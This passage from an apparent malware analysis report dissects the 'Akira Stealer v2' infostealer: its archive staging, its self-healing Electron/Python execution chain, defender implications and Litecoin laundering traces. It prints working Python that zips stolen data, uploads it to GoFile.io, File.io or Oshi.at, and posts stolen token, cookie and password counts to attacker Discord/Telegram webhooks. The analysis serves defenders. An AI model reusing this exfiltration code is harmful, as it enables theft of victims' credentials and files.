This format simplifies bulk retrieval and inspection by attackers, especially if hundreds of victims are compromised in parallel.",[1545,16053,16055],{"className":10501,"code":16054,"language":10503,"meta":863,"style":863},"import zipfile, datetime\n\ndef create_archive(root_dir: str) -> str:\n    ts = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')\n    zip_name = os.path.basename(root_dir) + f'_{ts}.zip'\n    zip_path = os.path.join(os.path.dirname(root_dir), zip_name)\n    with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zf:\n        for dirpath, _, files in os.walk(root_dir):\n            for fname in files:\n                full = os.path.join(dirpath, fname)\n                rel = os.path.relpath(full, root_dir)\n                zf.write(full, rel)\n    return zip_path\n",[1524,16056,16057,16062,16066,16071,16076,16081,16086,16091,16096,16101,16106,16111,16116],{"__ignoreMap":863},[1588,16058,16059],{"class":1590,"line":1591},[1588,16060,16061],{},"import zipfile, datetime\n",[1588,16063,16064],{"class":1590,"line":864},[1588,16065,9865],{"emptyLinePlaceholder":508},[1588,16067,16068],{"class":1590,"line":1814},[1588,16069,16070],{},"def create_archive(root_dir: str) -> str:\n",[1588,16072,16073],{"class":1590,"line":1831},[1588,16074,16075],{},"    ts = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')\n",[1588,16077,16078],{"class":1590,"line":2135},[1588,16079,16080],{},"    zip_name = os.path.basename(root_dir) + f'_{ts}.zip'\n",[1588,16082,16083],{"class":1590,"line":2141},[1588,16084,16085],{},"    zip_path = os.path.join(os.path.dirname(root_dir), zip_name)\n",[1588,16087,16088],{"class":1590,"line":2147},[1588,16089,16090],{},"    with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zf:\n",[1588,16092,16093],{"class":1590,"line":2153},[1588,16094,16095],{},"        for dirpath, _, files in os.walk(root_dir):\n",[1588,16097,16098],{"class":1590,"line":2159},[1588,16099,16100],{},"            for fname in 
files:\n",[1588,16102,16103],{"class":1590,"line":2165},[1588,16104,16105],{},"                full = os.path.join(dirpath, fname)\n",[1588,16107,16108],{"class":1590,"line":11039},[1588,16109,16110],{},"                rel = os.path.relpath(full, root_dir)\n",[1588,16112,16113],{"class":1590,"line":11045},[1588,16114,16115],{},"                zf.write(full, rel)\n",[1588,16117,16118],{"class":1590,"line":11051},[1588,16119,16120],{},"    return zip_path\n",[2738,16122,16123],{},[2741,16124,16125,16126,16129],{},"Archive named ",[1524,16127,16128],{},"DESKTOP1234_20250505T123456Z.zip"," for host coherence.",[806,16131,16132],{},[1736,16133,16134],{},"ZIP Filename Convention",[806,16136,16137],{},"The archive is named using the compromised host’s computer name followed by a UTC timestamp in ISO format, ensuring uniqueness and chronological order.",[1545,16139,16141],{"className":10501,"code":16140,"language":10503,"meta":863,"style":863},"import datetime, os\n\ndef create_archive(root_dir: str) -> str:\n    # Generate UTC timestamp in YYYYMMDDThhmmssZ format\n    ts = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')\n    # Construct ZIP filename: \u003CComputerName>_\u003CTimestamp>.zip\n    zip_name = os.path.basename(root_dir) + f'_{ts}.zip'\n    zip_path = os.path.join(os.path.dirname(root_dir), zip_name)\n    return zip_path\n",[1524,16142,16143,16148,16152,16156,16161,16165,16170,16174,16178],{"__ignoreMap":863},[1588,16144,16145],{"class":1590,"line":1591},[1588,16146,16147],{},"import datetime, os\n",[1588,16149,16150],{"class":1590,"line":864},[1588,16151,9865],{"emptyLinePlaceholder":508},[1588,16153,16154],{"class":1590,"line":1814},[1588,16155,16070],{},[1588,16157,16158],{"class":1590,"line":1831},[1588,16159,16160],{},"    # Generate UTC timestamp in YYYYMMDDThhmmssZ format\n",[1588,16162,16163],{"class":1590,"line":2135},[1588,16164,16075],{},[1588,16166,16167],{"class":1590,"line":2141},[1588,16168,16169],{},"    # Construct ZIP filename: 
\u003CComputerName>_\u003CTimestamp>.zip\n",[1588,16171,16172],{"class":1590,"line":2147},[1588,16173,16080],{},[1588,16175,16176],{"class":1590,"line":2153},[1588,16177,16085],{},[1588,16179,16180],{"class":1590,"line":2159},[1588,16181,16120],{},[806,16183,16137],{},[1671,16185,16187],{"id":16186},"_7144-upload-workflow","7.14.4 Upload Workflow",[806,16189,1677],{},[806,16191,16192],{},"Akira uses a three-tier upload strategy to maximize the chance of successful data exfiltration. It first attempts to upload the archive to GoFile.io using their public API, which returns a download link. If GoFile is unavailable or blocked, it falls back to File.io and then Oshi.at, ensuring the data is always transferred. These services provide anonymous, short-lived hosting, which makes takedown and traceability difficult. The script captures the final download URL and prepares it for webhook delivery.",[4351,16194,16195,16227,16254],{},[2741,16196,16197,16200],{},[1736,16198,16199],{},"Primary: GoFile.io",[2738,16201,16202,16210,16218],{},[2741,16203,16204,2545,16207],{},[1736,16205,16206],{},"API to fetch servers",[1524,16208,16209],{},"GET https://api.gofile.io/servers",[2741,16211,16212,2545,16215],{},[1736,16213,16214],{},"Upload endpoint",[1524,16216,16217],{},"POST https://\u003Cserver>.gofile.io/contents/uploadfile",[2741,16219,16220,2545,16223,16226],{},[1736,16221,16222],{},"Response field",[1524,16224,16225],{},"data.downloadPage"," contains final URL.",[2741,16228,16229,16232],{},[1736,16230,16231],{},"Fallback #1: File.io",[2738,16233,16234,16244],{},[2741,16235,16236,2545,16238,7297,16241],{},[1736,16237,16214],{},[1524,16239,16240],{},"POST https://file.io/",[1524,16242,16243],{},"files={'file': open(...)}",[2741,16245,16246,16249,16250,16253],{},[1736,16247,16248],{},"Response",": JSON ",[1524,16251,16252],{},"link"," field.",[2741,16255,16256,16259],{},[1736,16257,16258],{},"Fallback #2: 
Oshi.at",[2738,16260,16261,16275],{},[2741,16262,16263,2545,16265,7297,16268,16271,16272,2786],{},[1736,16264,16214],{},[1524,16266,16267],{},"POST http://oshi.at/",[1524,16269,16270],{},"files[]"," and parameters ",[1524,16273,16274],{},"expire=43200, autodestroy=0",[2741,16276,16277,16279,16280,2786],{},[1736,16278,16248],{},": Plain text containing ",[1524,16281,16282],{},"DL: \u003Curl>",[806,16284,16285],{},[1736,16286,16287],{},"Implementation Snippet:",[1545,16289,16291],{"className":10501,"code":16290,"language":10503,"meta":863,"style":863},"import requests\n\ndef upload_with_fallback(zip_path):\n    # GoFile\n    try:\n        servers = requests.get('https://api.gofile.io/servers', timeout=10).json()['data']['servers']\n        for srv in servers:\n            try:\n                r = requests.post(\n                    f'https://{srv}.gofile.io/contents/uploadfile',\n                    files={'file': open(zip_path,'rb')}, timeout=20)\n                url = r.json()['data']['downloadPage']\n                if url: return url\n            except: continue\n    except: pass\n    # File.io\n    try:\n        r = requests.post('https://file.io/', files={'file': open(zip_path,'rb')}, timeout=20)\n        return r.json().get('link','')\n    except: pass\n    # Oshi.at\n    try:\n        text = requests.post('http://oshi.at/', files={'files[]': open(zip_path,'rb')}, data={'expire':'43200'}).text\n        return text.split('DL: ')[1].strip()\n    except: pass\n    return ''\n",[1524,16292,16293,16298,16302,16307,16312,16316,16321,16326,16331,16336,16341,16346,16351,16356,16361,16366,16371,16375,16380,16385,16389,16394,16398,16403,16408,16412],{"__ignoreMap":863},[1588,16294,16295],{"class":1590,"line":1591},[1588,16296,16297],{},"import requests\n",[1588,16299,16300],{"class":1590,"line":864},[1588,16301,9865],{"emptyLinePlaceholder":508},[1588,16303,16304],{"class":1590,"line":1814},[1588,16305,16306],{},"def 
upload_with_fallback(zip_path):\n",[1588,16308,16309],{"class":1590,"line":1831},[1588,16310,16311],{},"    # GoFile\n",[1588,16313,16314],{"class":1590,"line":2135},[1588,16315,11154],{},[1588,16317,16318],{"class":1590,"line":2141},[1588,16319,16320],{},"        servers = requests.get('https://api.gofile.io/servers', timeout=10).json()['data']['servers']\n",[1588,16322,16323],{"class":1590,"line":2147},[1588,16324,16325],{},"        for srv in servers:\n",[1588,16327,16328],{"class":1590,"line":2153},[1588,16329,16330],{},"            try:\n",[1588,16332,16333],{"class":1590,"line":2159},[1588,16334,16335],{},"                r = requests.post(\n",[1588,16337,16338],{"class":1590,"line":2165},[1588,16339,16340],{},"                    f'https://{srv}.gofile.io/contents/uploadfile',\n",[1588,16342,16343],{"class":1590,"line":11039},[1588,16344,16345],{},"                    files={'file': open(zip_path,'rb')}, timeout=20)\n",[1588,16347,16348],{"class":1590,"line":11045},[1588,16349,16350],{},"                url = r.json()['data']['downloadPage']\n",[1588,16352,16353],{"class":1590,"line":11051},[1588,16354,16355],{},"                if url: return url\n",[1588,16357,16358],{"class":1590,"line":11057},[1588,16359,16360],{},"            except: continue\n",[1588,16362,16363],{"class":1590,"line":11063},[1588,16364,16365],{},"    except: pass\n",[1588,16367,16368],{"class":1590,"line":11069},[1588,16369,16370],{},"    # File.io\n",[1588,16372,16373],{"class":1590,"line":11075},[1588,16374,11154],{},[1588,16376,16377],{"class":1590,"line":11081},[1588,16378,16379],{},"        r = requests.post('https://file.io/', files={'file': open(zip_path,'rb')}, timeout=20)\n",[1588,16381,16382],{"class":1590,"line":11087},[1588,16383,16384],{},"        return r.json().get('link','')\n",[1588,16386,16387],{"class":1590,"line":11093},[1588,16388,16365],{},[1588,16390,16391],{"class":1590,"line":11099},[1588,16392,16393],{},"    # 
Oshi.at\n",[1588,16395,16396],{"class":1590,"line":11105},[1588,16397,11154],{},[1588,16399,16400],{"class":1590,"line":11111},[1588,16401,16402],{},"        text = requests.post('http://oshi.at/', files={'files[]': open(zip_path,'rb')}, data={'expire':'43200'}).text\n",[1588,16404,16405],{"class":1590,"line":11117},[1588,16406,16407],{},"        return text.split('DL: ')[1].strip()\n",[1588,16409,16410],{"class":1590,"line":11123},[1588,16411,16365],{},[1588,16413,16414],{"class":1590,"line":11790},[1588,16415,16416],{},"    return ''\n",[1671,16418,16420],{"id":16419},"_7155-webhook-alerts-attacker-retrieval-analyst-visibility-limits","7.15.5 Webhook Alerts, Attacker Retrieval & Analyst Visibility Limits",[806,16422,1677],{},[806,16424,16425],{},"After uploading the ZIP archive, Akira sends a webhook notification—typically to Discord or Telegram—with a structured embed containing detailed information: number of stolen tokens, cookie count, file size, and a clickable download link. This gives attackers immediate feedback and retrieval access. To ensure reliability, a plaintext fallback message is also sent, containing just the archive link. This redundancy guarantees delivery, even if the embed is blocked by the platform or filtered. 
From the defender’s perspective, these communications are often invisible unless outbound network monitoring is in place.",[806,16427,16428],{},[1736,16429,16430],{},"Embed Notification",[1545,16432,16434],{"className":10501,"code":16433,"language":10503,"meta":863,"style":863},"# Build embed with key metadata\ntoken_count = len(os.listdir(os.path.join(ROOT, 'Tokens')))\nfields = [\n    {'name':'🗂️ Archive','value':f'[Download Archive]({download_url})','inline':False},\n    {'name':'📐 Size','value':f'{os.path.getsize(zip_path)//1024} KB','inline':True},\n    {'name':'🔑 Tokens','value':str(token_count),'inline':True},\n    {'name':'🍪 Cookies','value':str(data.cookie_count),'inline':True},\n    {'name':'🔐 Passwords','value':str(data.password_count),'inline':True},\n]\npayload = {\n    'username':'Akira 💊',\n    'embeds':[{'title':'🗄️ Exfiltration Complete','fields':fields}]\n}\nrequests.post(webhook_url, json=payload, timeout=8)\n",[1524,16435,16436,16441,16446,16451,16456,16461,16466,16471,16476,16480,16485,16490,16495,16499],{"__ignoreMap":863},[1588,16437,16438],{"class":1590,"line":1591},[1588,16439,16440],{},"# Build embed with key metadata\n",[1588,16442,16443],{"class":1590,"line":864},[1588,16444,16445],{},"token_count = len(os.listdir(os.path.join(ROOT, 'Tokens')))\n",[1588,16447,16448],{"class":1590,"line":1814},[1588,16449,16450],{},"fields = [\n",[1588,16452,16453],{"class":1590,"line":1831},[1588,16454,16455],{},"    {'name':'🗂️ Archive','value':f'[Download Archive]({download_url})','inline':False},\n",[1588,16457,16458],{"class":1590,"line":2135},[1588,16459,16460],{},"    {'name':'📐 Size','value':f'{os.path.getsize(zip_path)//1024} KB','inline':True},\n",[1588,16462,16463],{"class":1590,"line":2141},[1588,16464,16465],{},"    {'name':'🔑 Tokens','value':str(token_count),'inline':True},\n",[1588,16467,16468],{"class":1590,"line":2147},[1588,16469,16470],{},"    {'name':'🍪 
Cookies','value':str(data.cookie_count),'inline':True},\n",[1588,16472,16473],{"class":1590,"line":2153},[1588,16474,16475],{},"    {'name':'🔐 Passwords','value':str(data.password_count),'inline':True},\n",[1588,16477,16478],{"class":1590,"line":2159},[1588,16479,13933],{},[1588,16481,16482],{"class":1590,"line":2165},[1588,16483,16484],{},"payload = {\n",[1588,16486,16487],{"class":1590,"line":11039},[1588,16488,16489],{},"    'username':'Akira 💊',\n",[1588,16491,16492],{"class":1590,"line":11045},[1588,16493,16494],{},"    'embeds':[{'title':'🗄️ Exfiltration Complete','fields':fields}]\n",[1588,16496,16497],{"class":1590,"line":11051},[1588,16498,8430],{},[1588,16500,16501],{"class":1590,"line":11057},[1588,16502,16503],{},"requests.post(webhook_url, json=payload, timeout=8)\n",[2738,16505,16506,16512],{},[2741,16507,16508,16511],{},[1736,16509,16510],{},"Delivery",": Sent to the attacker’s Discord/Telegram channel.",[2741,16513,16514,16517,16518,16521],{},[1736,16515,16516],{},"Embed Link",": Contains a clickable ",[1524,16519,16520],{},"download_url"," pointing to the ZIP on GoFile (or fallback host).",[806,16523,16524],{},[1736,16525,16526],{},"Raw Link Fallback",[1545,16528,16530],{"className":10501,"code":16529,"language":10503,"meta":863,"style":863},"# Ensure attacker always has direct URL, even if embeds fail\nmessage = f\"📥 Archive available at: {download_url}\"\nrequests.post(webhook_url, data={'message': message}, timeout=8)\n",[1524,16531,16532,16537,16542],{"__ignoreMap":863},[1588,16533,16534],{"class":1590,"line":1591},[1588,16535,16536],{},"# Ensure attacker always has direct URL, even if embeds fail\n",[1588,16538,16539],{"class":1590,"line":864},[1588,16540,16541],{},"message = f\"📥 Archive available at: {download_url}\"\n",[1588,16543,16544],{"class":1590,"line":1814},[1588,16545,16546],{},"requests.post(webhook_url, data={'message': message}, timeout=8)\n",[2738,16548,16549],{},[2741,16550,16551,16554],{},[1736,16552,16553],{},"Plain Text",": 
Guarantees delivery of the link in case embeds are blocked or silently dropped.",[806,16556,16557],{},[1736,16558,16559],{},"How the Attacker Retrieves the Link",[806,16561,16562,16565],{},[1736,16563,16564],{},"1. Webhook Infrastructure","\nThe attacker embeds the webhook endpoint in the malware configuration:",[1545,16567,16569],{"className":10501,"code":16568,"language":10503,"meta":863,"style":863},"# at class initialization\nself.default_webhook = \"%DISCORD_OR_TG_WEBHOOK_URL%\"\n",[1524,16570,16571,16576],{"__ignoreMap":863},[1588,16572,16573],{"class":1590,"line":1591},[1588,16574,16575],{},"# at class initialization\n",[1588,16577,16578],{"class":1590,"line":864},[1588,16579,16580],{},"self.default_webhook = \"%DISCORD_OR_TG_WEBHOOK_URL%\"\n",[2738,16582,16583,16590],{},[2741,16584,16585,2545,16587],{},[1736,16586,7358],{},[1524,16588,16589],{},"https://discord.com/api/webhooks/\u003CWEBHOOK_ID>/\u003CWEBHOOK_TOKEN>",[2741,16591,16592,2545,16595],{},[1736,16593,16594],{},"Telegram",[1524,16596,16597],{},"https://api.telegram.org/bot\u003CTELEGRAM_TOKEN>/sendMessage",[806,16599,16600,16603],{},[1736,16601,16602],{},"2. 
Real-Time Delivery","\nImmediately after a successful file upload, the malware executes:",[1545,16605,16607],{"className":10501,"code":16606,"language":10503,"meta":863,"style":863},"payload = {\n  'username': 'Akira 💊',\n  'embeds': [{\n      'title': '🗄️ Exfiltration Complete',\n      'fields': [\n          {'name': '🗂️ Archive', 'value': f'[Download ZIP]({download_url})'}\n      ]\n  }]\n}\n# Transmit the archive URL entirely in the JSON body\nrequests.post(self.default_webhook, json=payload, timeout=8)\n",[1524,16608,16609,16613,16618,16623,16628,16633,16638,16643,16648,16652,16657],{"__ignoreMap":863},[1588,16610,16611],{"class":1590,"line":1591},[1588,16612,16484],{},[1588,16614,16615],{"class":1590,"line":864},[1588,16616,16617],{},"  'username': 'Akira 💊',\n",[1588,16619,16620],{"class":1590,"line":1814},[1588,16621,16622],{},"  'embeds': [{\n",[1588,16624,16625],{"class":1590,"line":1831},[1588,16626,16627],{},"      'title': '🗄️ Exfiltration Complete',\n",[1588,16629,16630],{"class":1590,"line":2135},[1588,16631,16632],{},"      'fields': [\n",[1588,16634,16635],{"class":1590,"line":2141},[1588,16636,16637],{},"          {'name': '🗂️ Archive', 'value': f'[Download ZIP]({download_url})'}\n",[1588,16639,16640],{"class":1590,"line":2147},[1588,16641,16642],{},"      ]\n",[1588,16644,16645],{"class":1590,"line":2153},[1588,16646,16647],{},"  }]\n",[1588,16649,16650],{"class":1590,"line":2159},[1588,16651,8430],{},[1588,16653,16654],{"class":1590,"line":2165},[1588,16655,16656],{},"# Transmit the archive URL entirely in the JSON body\n",[1588,16658,16659],{"class":1590,"line":11039},[1588,16660,16661],{},"requests.post(self.default_webhook, json=payload, timeout=8)\n",[2738,16663,16664,16672],{},[2741,16665,8620,16666,16668,16669,2786],{},[1524,16667,16520],{}," variable is interpolated into the embed’s ",[1524,16670,16671],{},"fields.value",[2741,16673,16674,16675,16677,16678,8234],{},"For Telegram fallback, the ",[1524,16676,16520],{}," appears in the 
plain-text ",[1524,16679,929],{},[806,16681,16682],{},[1736,16683,16684],{},"3. EDR & Forensic Visibility Limitations",[2738,16686,16687,16696],{},[2741,16688,16689,16692,16693,16695],{},[1736,16690,16691],{},"No Local Logging",": The malware does not write the ",[1524,16694,16520],{}," to disk or system logs.",[2741,16697,16698,16701],{},[1736,16699,16700],{},"EDR Blind Spots",": Tools like Microsoft Defender for Endpoint may log the outbound HTTP request (process and destination host) but do not capture the request body, so the embedded URL is not extracted.",[806,16703,16704],{},[1736,16705,16706],{},"4. Why the Analyst Cannot Recover This Locally:",[2738,16708,16709,16722,16741],{},[2741,16710,16711,16714,16715,16717,16718,16721],{},[1736,16712,16713],{},"No Local Copy of Link",": The malware writes the ",[1524,16716,16520],{}," only in memory and transmits it over the network; it does ",[4655,16719,16720],{},"not"," save this URL to disk or logs.",[2741,16723,16724,16727,16728,16730,2781,16735,16737,16738,2786],{},[1736,16725,16726],{},"Ephemeral Staging Cleanup",": Immediately after upload, the code executes:",[2016,16729],{},[1588,16731,16734],{"className":16732},[16733],"text-monospace","shutil.rmtree(ROOT)",[2016,16736],{},"\nerasing all staged artifacts (including any transient text files) from ",[1524,16739,16740],{},"%TEMP%",[2741,16742,16743,16746,16747,16750],{},[1736,16744,16745],{},"Network-Only Transmission",": Webhook calls (",[1524,16748,16749],{},"requests.post",") occur in-memory; no HTTP logs or browser history entries are created on the victim machine.",[3587,16752,16753],{},[806,16754,16755,16758,16759,16761,16762,16764],{},[1736,16756,16757],{},"Implication for Analysts:","\nWithout live packet capture (e.g., network TAP or proxy) at the time of execution, the exact ",[1524,16760,16520],{}," is unrecoverable post-infection.\nAdditionally, the exfiltrated archive is auto-deleted from the hosting service, further reducing the window for forensic retrieval.\nPost-infection imaging or host-based forensic 
recovery will ",[4655,16763,16720],{}," reveal the attacker’s URL or file host credentials, as no artifacts remain locally.",[1541,16766],{"className":16767},[6875,6876],[810,16769,16771],{"id":16770},"_713-conclusion","7.13 Conclusion",[806,16773,1536],{},[806,16775,16776,16778],{},[1524,16777,6643],{}," (Akira Stealer v2) is a comprehensive, commercially distributed stealer toolkit. It combines extensive targeting, sophisticated anti-analysis, dynamic infrastructure control, and full-stack data theft across credentials, crypto, system profiling, and user files. Its modularity and stealth, combined with rapid reinfection methods, make it one of the most technically advanced stealers observed in active deployment.",[1511,16780,16782],{"id":16781},"_8-circular-execution-chain-a-self-healing-loop","8. Circular Execution Chain: A Self-Healing Loop",[806,16784,816],{},[806,16786,16787,16788,16791],{},"One of the most technically sophisticated elements of this campaign is its regenerative, circular execution model. Unlike conventional malware with linear stages that flow from dropper to payload and then vanish, this operation was engineered like a ",[1736,16789,16790],{},"closed loop"," — where every component watches over the others.",[806,16793,16794,16795,16798],{},"This ",[1736,16796,16797],{},"self-healing architecture"," made the infection chain not only persistent, but also autonomous. It could fully recover from partial removals. As long as one piece remained alive, the entire malware ecosystem could reassemble itself.",[810,16800,16802],{"id":16801},"_81-behavioral-breakdown","8.1 Behavioral Breakdown",[806,16804,1536],{},[4351,16806,16807,16833,16846,16877,16895],{},[2741,16808,16809,16814,16816,16817,16820,16821,16823,16824,16826,16827,16829,16830,16832],{},[1736,16810,16811,16812,2772],{},"Persistence Anchor (",[1524,16813,6635],{},[1524,16815,6635],{}," acts as the foundational foothold. 
It is typically dropped into a Windows user startup location, such as ",[1524,16818,16819],{},"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup",", or registered via ",[1524,16822,7686],{},". Its job is simple but critical: ensure ",[1524,16825,6639],{}," is present and launch it silently during user logon. If ",[1524,16828,6639],{}," is missing, it re-extracts the archive ",[1524,16831,7852],{}," (located in a temp folder or dropped anew), regenerating the full Electron app structure.",[2741,16834,16835,16840,16842,16843,16845],{},[1736,16836,16837,16838,2772],{},"Bridge Loader (",[1524,16839,6639],{},[1524,16841,6639],{}," is the Electron-wrapped Node.js application. It doesn’t expose any GUI and operates entirely in the background. Upon execution, it runs the embedded JavaScript logic within ",[1524,16844,7089],{},", using Node.js as a runtime environment. This abstraction layer decouples the core logic from the PE stub, helping to evade traditional analysis.",[2741,16847,16848,16853,16854,16856,16857],{},[1736,16849,16850,16851,2772],{},"Execution Orchestrator (",[1524,16852,8830],{},"\nEmbedded within ",[1524,16855,7089],{},", this is the true controller of the infection chain. Its key functions include:",[2738,16858,16859,16865,16868],{},[2741,16860,16861,16862,16864],{},"Checking for the presence of ",[1524,16863,6635],{}," and redeploying it if missing",[2741,16866,16867],{},"Dynamically injecting runtime configuration: webhook URLs, C2 addresses, tokens",[2741,16869,16870,16871,16873,16874,16876],{},"Either invoking the already-present Python payload (",[1524,16872,6643],{},") or downloading it as part of a ZIP bundle (e.g., ",[1524,16875,8894],{},") from attacker-controlled infrastructure",[2741,16878,16879,16884,16885,16887,16888,16890,16891,16894],{},[1736,16880,16881,16882,2772],{},"Payload Execution (",[1524,16883,6643],{},"\nOnce triggered, ",[1524,16886,6643],{}," executes in memory via ",[1524,16889,6615],{},". 
It systematically collects saved credentials, cookies, Discord tokens, browser session data, and cryptocurrency wallet extensions. The data is staged in a ZIP archive and exfiltrated via HTTPS — commonly to Discord webhooks, but fallback APIs like ",[1524,16892,16893],{},"gofile.io"," or custom C2 endpoints have also been observed.",[2741,16896,16897,16900,16901,16903,16904,16906,16907,16909,16910,16912,16913,16915],{},[1736,16898,16899],{},"Loop Integrity and Self-Healing","\nThe design is circular. If ",[1524,16902,6635],{}," is deleted, it will be redeployed. If ",[1524,16905,6639],{}," is missing, ",[1524,16908,6635],{}," re-extracts it from ",[1524,16911,7852],{},". If ",[1524,16914,6643],{}," is deleted, it is re-obtained by the JavaScript layer. This interdependency makes the malware resilient and capable of reconstructing its execution chain from virtually any surviving fragment.",[806,16917,16918,16919,16922],{},"This architecture is not just modular — it’s ",[1736,16920,16921],{},"self-sustaining",", deliberately engineered for stealth, flexibility, and long-term survivability in target environments.",[810,16924,16926],{"id":16925},"_82-why-this-is-noteworthy","8.2 Why This Is Noteworthy",[806,16928,1536],{},[806,16930,16931,16932,2786],{},"The campaign’s architectural design reflects a level of sophistication not typically seen in commodity infostealers. It goes beyond simple multi-stage loaders — this is malware engineered for ",[1736,16933,16934],{},"operational resilience, stealth, and automation",[806,16936,16937],{},[1736,16938,16939],{},"Key Characteristics",[2738,16941,16942,16948,16985,17005],{},[2741,16943,16944,16947],{},[1736,16945,16946],{},"Full Autonomy","\nOnce deployed, the malware requires no user interaction or external reactivation. 
It acts like a malicious microservice — orchestrating its own persistence, payload execution, and repair routines without external control.",[2741,16949,16950,16953,16954],{},[1736,16951,16952],{},"Multi-Language Execution Stack","\nThe toolchain integrates:",[2738,16955,16956,16965,16971,16977],{},[2741,16957,16958,2887,16961,2289,16963,2772],{},[1736,16959,16960],{},"PE Binaries",[1524,16962,6635],{},[1524,16964,6639],{},[2741,16966,16967,16970],{},[1736,16968,16969],{},"Node.js / JavaScript"," (via Electron)",[2741,16972,16973,16976],{},[1736,16974,16975],{},"PowerShell"," (used for obfuscated payload relay)",[2741,16978,16979,2887,16982,16984],{},[1736,16980,16981],{},"Python",[1524,16983,6643],{},", executed as memory-resident stealer)\nThis layered composition makes it harder to profile, fingerprint, and analyze using conventional static tools.",[2741,16986,16987,16990,16991],{},[1736,16988,16989],{},"Defense Evasion by Design","\nEvery component is encoded, encrypted, or dynamically injected:",[2738,16992,16993,16996,16999,17002],{},[2741,16994,16995],{},"Base64 PowerShell relay",[2741,16997,16998],{},"AES-encrypted and GZIP-compressed Python core",[2741,17000,17001],{},"Obfuscated JavaScript with runtime token injection",[2741,17003,17004],{},"Self-healing behavior that frustrates partial removal",[2741,17006,17007,17010,17011,16912,17014,17016,17017,17019],{},[1736,17008,17009],{},"No Single Point of Failure","\nThe malware’s self-repair logic ensures that ",[1736,17012,17013],{},"removal of a single component is insufficient",[1524,17015,6635],{}," is removed, the info stealer recreates it. 
If ",[1524,17018,6643],{}," is deleted, it is redownloaded and redeployed by the JavaScript controller.",[806,17021,17022,17023,17026],{},"In short, the malware behaves more like a ",[1736,17024,17025],{},"distributed system"," than a typical payload — one that prioritizes survivability, modularity, and stealth.",[806,17028,17029,17030,17033],{},"This elevates the threat from an opportunistic attack to a ",[1736,17031,17032],{},"resilient, adaptive platform"," — requiring defenders to match its complexity with equally layered detection and response strategies.",[810,17035,17037],{"id":17036},"_83-implications-for-blue-teams","8.3 Implications for Blue Teams",[806,17039,1536],{},[806,17041,17042],{},"For defenders and CSOC operators, this kind of architecture raises the bar:",[2738,17044,17045,17051,17066],{},[2741,17046,17047,17050],{},[1736,17048,17049],{},"Partial cleanup is ineffective",". All nodes must be identified and removed simultaneously.",[2741,17052,17053,17056,17057,17059,17060,17059,17062,17059,17064,2786],{},[1736,17054,17055],{},"Defender for Endpoint correlation"," is essential. Analysts must trace full chains: from ",[1524,17058,6635],{}," → ",[1524,17061,7144],{},[1524,17063,7239],{},[1524,17065,6615],{},[2741,17067,17068,17071],{},[1736,17069,17070],{},"IOC-free persistence"," means memory-based heuristics, telemetry baselining, and chain-based detection are key.",[806,17073,17074,17075,17078],{},"This isn’t just a stealer. It’s a ",[1736,17076,17077],{},"resilient malware platform"," — behaving more like a distributed system than a simple threat. And that’s exactly what makes it both impressive and dangerous.",[1511,17080,17082],{"id":17081},"_9-blockchain-tracking-and-analysis","9. 
Blockchain Tracking and Analysis",[806,17084,816],{},[810,17086,17088],{"id":17087},"_91-tracing-fund-distribution-in-a-litecoin-based-malware-campaign","9.1 Tracing Fund Distribution in a Litecoin-Based Malware Campaign",[806,17090,1536],{},[806,17092,17093,17094,17097],{},"During the reverse engineering phase of this malware campaign, we extracted multiple hardcoded wallet addresses used by the stealer for cryptocurrency exfiltration. By following the on-chain activity of these Litecoin wallets, we were able to uncover patterns indicative of deliberate money laundering tactics. The attacker-controlled wallet ",[1524,17095,17096],{},"LW6EopiZ..."," acts as a central aggregation point. Funds stolen from multiple victims are funneled into this address, after which they are rapidly redistributed across multiple new addresses.",[806,17099,17100],{},"The behavior seen here is representative of a classic split-transfer pattern used in crypto tumbling or mixing operations. In each instance, the full incoming balance is divided into two roughly proportional outbound transactions, each sent to a different wallet. This strategy is designed to hinder address clustering and chain tracing by obfuscating the provenance of funds. It’s an effective tactic to evade detection by automated blockchain analytics and threat intelligence platforms.",[806,17102,17103],{},"This laundering behavior leverages a combination of transaction timing, precise value splitting, and address reuse minimization to bypass heuristics commonly applied by clustering algorithms like those used in GraphSense, Chainalysis, or TRM Labs. The overall intent is to create high-entropy transactional flows, which confuse attribution and disrupt linkability, especially when the funds are eventually bridged across other assets or swapped into privacy-focused coins.",[806,17105,17106],{},"In the example below, we show a structured subset of this behavior. The incoming transactions represent distinct victim transfers. 
These values are then perfectly mapped to outbound flows, showing the coins being \"washed\" through fast, predictable, and algorithmically split payouts.",[1902,17108,1905,17111],{"className":17109,"style":10692},[17110],"font-size-1",[1923,17112,17113,1905,17136,1905,17168,1905,17196,1905,17225],{},[1911,17114,1909,17115,1909,17119,1909,17123,1909,17126,1909,17130,1909,17133,1905],{},[1915,17116,17118],{"style":17117},"text-align: left; width: 14%;","Input Source",[1915,17120,17122],{"style":17121},"text-align: left; width: 12%;","Input Date",[1915,17124,17125],{"style":17117},"Amount In (LTC)",[1915,17127,17129],{"style":17128},"text-align: left; width: 20%;","→ Attacker Wallet",[1915,17131,17132],{"style":12313},"Output Addresses",[1915,17134,17135],{"style":10861},"Total Out (LTC)",[1911,17137,1909,17138,1909,17141,1909,17144,1909,17147,1909,17153,1909,17166,1905],{},[1928,17139,17140],{},"Input_1",[1928,17142,17143],{},"2024-09-21",[1928,17145,17146],{},"0.25339198",[1928,17148,1913,17149,1909],{},[1588,17150,17152],{"title":17151},"LLQtaBnSAFpCFUw5cXRRka7Nvtrs4Up9bH","LLQtaBnSAF...",[1928,17154,17155,17156,17159,17160,17155,17162,17165],{},"\n      - ",[1524,17157,17158],{},"LZmHkgkED..."," (0.15579078, 2024-09-26)",[2016,17161],{},[1524,17163,17164],{},"M8JpDsw5H7..."," (0.09760120, 2024-09-26)\n    ",[1928,17167,17146],{},[1911,17169,1909,17170,1909,17173,1909,17176,1909,17179,1909,17183,1909,17194,1905],{"style":10717},[1928,17171,17172],{},"Input_2",[1928,17174,17175],{},"2024-04-16",[1928,17177,17178],{},"1.09976044",[1928,17180,1913,17181,1909],{},[1588,17182,17152],{"title":17151},[1928,17184,17155,17185,17188,17189,17155,17191,17193],{},[1524,17186,17187],{},"LgWrCAF8ED..."," (0.84304664, 2024-06-13)",[2016,17190],{},[1524,17192,17187],{}," (0.25671380, 2024-06-13)\n    
